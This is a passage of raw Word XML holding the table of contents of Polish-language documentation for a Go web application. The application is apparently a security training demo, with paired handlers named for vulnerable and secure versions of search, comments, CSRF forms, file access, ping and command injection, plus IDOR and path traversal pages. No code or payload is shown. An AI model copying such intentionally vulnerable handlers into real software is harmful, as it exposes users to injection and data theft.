            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.22. *Handler.currentUsername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sec56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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.23. *Handler.requireLoginJSON </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec57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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.24. *Handler.requireLoginUI </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec58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59">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.25. *Handler.GetPosts </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec59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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.26. *Handler.PostLogin </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec60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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.27. *Handler.PostRegister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sec61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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.28. *Handler.PostCreate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sec62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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.29. *Handler.PostUpdate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sec63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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.30. *Handler.PostDelete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sec64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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.31. *Handler.PagePosts </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec65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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.32. *Handler.PageLogin </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec66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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.33. *Handler.PageRegister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sec67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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.34. *Handler.PageRegisterSubmit </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec68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69">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.35. *Handler.PageRegisterPartial </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec69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0">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.36. *Handler.PagePostsPartial </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec70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1">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.37. readPublishedFromForm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sec71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2">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.38. *Handler.saveUploadedAttachment </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec72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3">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.39. sanitizeFilename </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec73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4">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.40. *Handler.PagePostsCreate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sec74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5">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.41. *Handler.PagePostsCreatePartial </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...............................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec75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6">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.42. *Handler.PagePostEdit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sec76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7">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.43. *Handler.PagePostEditSubmit </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec77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8">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.44. *Handler.PagePostDelete </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec78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79">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.45. *Handler.evaluateLogin </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec79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80">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.46. *Handler.Logout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sec80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81">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.47. *Handler.canDeletePost </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec81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82">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.48. *Handler.PageLoginSubmit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sec82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83">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.49. *Handler.PageLoginPartial </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec83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84">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.50. *Handler.Search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sec84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85">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.51. *Handler.SearchVulnerable </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec85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86">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.52. *Handler.PageSearch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sec86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87">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.53. *Handler.PageSearchPartial </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec87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88">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.54. modeLabel </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec88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89">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.55. *Handler.PageSecurityMap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sec89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90">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.56. *Handler.PageVulnDemos </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>........................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec90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91">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.57. *Handler.CommentsVulnerable </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec91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92">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.58. *Handler.CsrfFormVulnerable </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec92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93">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.59. *Handler.ProfileSettings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sec93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94">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.60. *Handler.CommentsSecure </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec94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95">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.61. *Handler.PagePostDetail </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec95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96">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.62. *Handler.PagePostCommentSubmit </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec96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97">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.63. generateCSRFToken </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec97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98">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.64. setCSRFCookie </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec98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99">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.65. *Handler.CsrfSecureForm </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec99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00">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.66. *Handler.PageIDOR </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec100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01">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.67. *Handler.PageDBExpose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sec101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02">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.68. *Handler.FilesVulnerable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sec102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03">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.69. *Handler.FilesSecure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sec103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04">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.70. safeUploadPath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sec104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05">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.71. *Handler.PagePathTraversal </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec105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06">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.72. validatePingHost </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec106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07">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.73. runSecurePing </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec107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08">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.74. *Handler.PingVulnerable </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.......................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec108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09">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.75. *Handler.PingSecure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sec109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10">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">6.76. *Handler.PageCmdInjection </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.....................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec110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111">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7. internal/security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sec111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12">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7.1. Typy </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...........................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec112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13">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7.2. ModeStore </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>......................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec113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14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7.3. Funkcje i metody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sec114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15">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7.4. NewModeStore </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>...................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec115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16">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7.5. *ModeStore.Enabled </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.............................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec116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17">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7.6. *ModeStore.Set </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.................................................</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">PAGEREF sec117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18">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1F4E79"/>
            <w:u w:val="single"/>
            <w:sz w:val="23"/>
          </w:rPr>
          <w:t xml:space="preserve">7.7. *ModeStore.Toggle </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>..............................................</w:t>
